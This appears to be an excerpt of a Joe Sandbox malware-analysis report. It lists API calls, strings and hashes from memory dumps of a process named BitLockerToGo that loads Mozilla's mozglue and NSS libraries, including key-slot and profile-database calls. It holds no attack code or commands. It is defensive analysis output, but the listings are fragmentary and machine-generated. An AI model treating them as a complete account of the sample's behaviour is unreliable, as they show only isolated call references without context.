                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                                                                                    • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                                                                                                                                                                                                                                                                    • API String ID: 2238633743-1964193996
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 05ccd04a027cbd5bc84e2bfa03b4345692b877b378b1ee04051b942a51222402
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 25eabafe9eba6f20d6d20a5ecb32a7aebbdb0b97b28a28a5e849b3f745c47d5f
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05ccd04a027cbd5bc84e2bfa03b4345692b877b378b1ee04051b942a51222402
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C5151B0B15B025BEB029F35AD44D263AFDEB5634D7318469A931E2A41EF70D845CFA0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C98582D), ref: 6C9BCC27
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C98582D), ref: 6C9BCC3D
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C9EFE98,?,?,?,?,?,6C98582D), ref: 6C9BCC56
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C98582D), ref: 6C9BCC6C
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C98582D), ref: 6C9BCC82
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C98582D), ref: 6C9BCC98
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C98582D), ref: 6C9BCCAE
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C9BCCC4
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C9BCCDA
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C9BCCEC
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C9BCCFE
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C9BCD14
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C9BCD82
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C9BCD98
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C9BCDAE
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C9BCDC4
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C9BCDDA
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C9BCDF0
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C9BCE06
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C9BCE1C
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C9BCE32
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C9BCE48
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C9BCE5E
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C9BCE74
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C9BCE8A
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: strcmp
                                                                                                                                                                                                                                                                                                                    • String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
                                                                                                                                                                                                                                                                                                                    • API String ID: 1004003707-2809817890
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 15004a706b272e89b98cb0c705fae61a839452eda890c067457e2230872df07b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 766b72771e136f228da3b57bfd6a23473be84e17576790d48d0093d50d1df7ae
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 15004a706b272e89b98cb0c705fae61a839452eda890c067457e2230872df07b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D51CAC5B0532671FB0232596D10BAF180CEFF724AF10543AED69B5E81FB24E61A46B7
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C984730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C9844B2,6C9FE21C,6C9FF7F8), ref: 6C98473E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6C984730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C98474A
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C9844BA
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C9844D2
                                                                                                                                                                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C9FF80C,6C97F240,?,?), ref: 6C98451A
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C98455C
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(?), ref: 6C984592
                                                                                                                                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(6C9FF770), ref: 6C9845A2
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000008), ref: 6C9845AA
                                                                                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000018), ref: 6C9845BB
                                                                                                                                                                                                                                                                                                                    • InitOnceExecuteOnce.KERNEL32(6C9FF818,6C97F240,?,?), ref: 6C984612
                                                                                                                                                                                                                                                                                                                    • ?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C984636
                                                                                                                                                                                                                                                                                                                    • LoadLibraryW.KERNEL32(user32.dll), ref: 6C984644
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000114), ref: 6C98466D
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C98469F
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9846AB
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9846B2
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9846B9
                                                                                                                                                                                                                                                                                                                    • VerSetConditionMask.NTDLL ref: 6C9846C0
                                                                                                                                                                                                                                                                                                                    • VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C9846CD
                                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6C9846F1
                                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C9846FD
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
                                                                                                                                                                                                                                                                                                                    • String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4C50
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4C5B
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(6CBCAAF9,?,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4C76
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4CAE
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAF4CC9
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAF4CF4
                                                                                                                                                                                                                                                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CAF4D0B
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4D5E
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6CAE4F51,00000000), ref: 6CAF4D68
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6CAF4D85
                                                                                                                                                                                                                                                                                                                    • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6CAF4DA2
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAF4DB9
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAF4DCF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                                                                                                                    • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6CAD2DEC
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6CAD2E00
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAD2E2B
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6CAD2E43
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6CAA4F1C,?,-00000001,00000000,?), ref: 6CAD2E74
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6CAA4F1C,?,-00000001,00000000), ref: 6CAD2E88
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAD2EC6
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAD2EE4
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6CAD2EF8
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD2F62
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD2F86
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C), ref: 6CAD2F9E
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD2FCA
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD301A
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAD302E
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD3066
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CAD3085
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD30EC
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD310C
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C), ref: 6CAD3124
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD314C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAB9180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6CAE379E,?,6CAB9568,00000000,?,6CAE379E,?,00000001,?), ref: 6CAB918D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAB9180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6CAE379E,?,6CAB9568,00000000,?,6CAE379E,?,00000001,?), ref: 6CAB91A0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807AD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807CD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA1204A), ref: 6CA807E4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,6CA1204A), ref: 6CA80864
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA80880
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,6CA1204A), ref: 6CA808CB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808D7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808FB
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CAD316D
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3383223490-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6CAD6943
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6CAD6957
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6CAD6972
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6CAD6983
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6CAD69AA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6CAD69BE
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6CAD69D2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6CAD69DF
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6CAD6A5B
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAD6D8C
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD6DC5
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6DD6
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6DE7
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6CAD6E1F
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAD6E4B
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAD6E72
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6EA7
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6EC4
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6ED5
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD6EE3
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6EF4
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6F08
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD6F35
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6F44
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6CAD6F5B
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD6F65
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6CAD781D,00000000,6CACBE2C,?,6CAD6B1D,?,?,?,?,00000000,00000000,6CAD781D), ref: 6CAD6C40
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6CAD781D,?,6CACBE2C,?), ref: 6CAD6C58
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6CAD781D), ref: 6CAD6C6F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6CAD6C84
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6CAD6C96
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6CAD6CAA
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAD6F90
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6CAD6FC5
                                                                                                                                                                                                                                                                                                                    • PK11_GetInternalKeySlot.NSS3 ref: 6CAD6FF4
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1304971872-0
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD4C4C
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAD4C60
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CA1
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CBE
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4CD2
                                                                                                                                                                                                                                                                                                                    • realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4D3A
                                                                                                                                                                                                                                                                                                                    • PORT_Alloc_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4D4F
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4DB7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: TlsGetValue.KERNEL32 ref: 6CB3DD8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB3DDB4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807AD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807CD
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6CA1204A), ref: 6CA807D6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6CA1204A), ref: 6CA807E4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,6CA1204A), ref: 6CA80864
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: calloc.MOZGLUE(00000001,0000002C), ref: 6CA80880
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsSetValue.KERNEL32(00000000,?,?,6CA1204A), ref: 6CA808CB
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808D7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA807A0: TlsGetValue.KERNEL32(?,?,6CA1204A), ref: 6CA808FB
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD4DD7
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAD4DEC
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD4E1B
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CAD4E2F
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAD4E5A
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(00000000,00000000), ref: 6CAD4E71
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD4E7A
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD4EA2
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CAD4EC1
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CAD4ED6
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?), ref: 6CAD4F01
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CAD4F2A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
